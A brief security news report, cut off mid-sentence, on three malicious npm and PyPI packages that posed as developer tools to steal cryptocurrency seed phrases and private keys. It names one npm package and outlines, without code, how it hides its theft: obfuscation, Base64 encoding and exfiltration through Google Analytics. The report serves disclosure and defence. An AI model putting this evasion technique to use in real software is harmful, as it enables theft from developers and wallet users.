Threat Actors Leverage npm and PyPI with Impersonated Dev Tools for Credential Theft

The Socket Threat Research Team has unearthed a trio of malicious packages, two hosted on the Python Package Index (PyPI) and one on the npm registry, designed to silently pilfer cryptocurrency secrets, including mnemonic seed phrases and private keys.

Released between 2021 and 2024, these packages, under the guise of harmless developer tools, have been downloaded thousands of times, showcasing a growing trend in software supply chain attacks targeting open-source ecosystems.

Subtle Subversion in Open Source

The npm package react-native-scrollpageviewtest, masquerading as a page-scrolling helper, has been downloaded 1215 times.

Its modus operandi involves an intricate combination of obfuscation and evasion techniques.

Once installed, it dynamically loads the host React Native wallet engine to extract sensitive data, which is then encoded in Base64 and stealthily exfiltrated to the control server using Google Analytics as a seemingly innocuous endpoint for data transmission.

This method not only evades detection but also leverages ...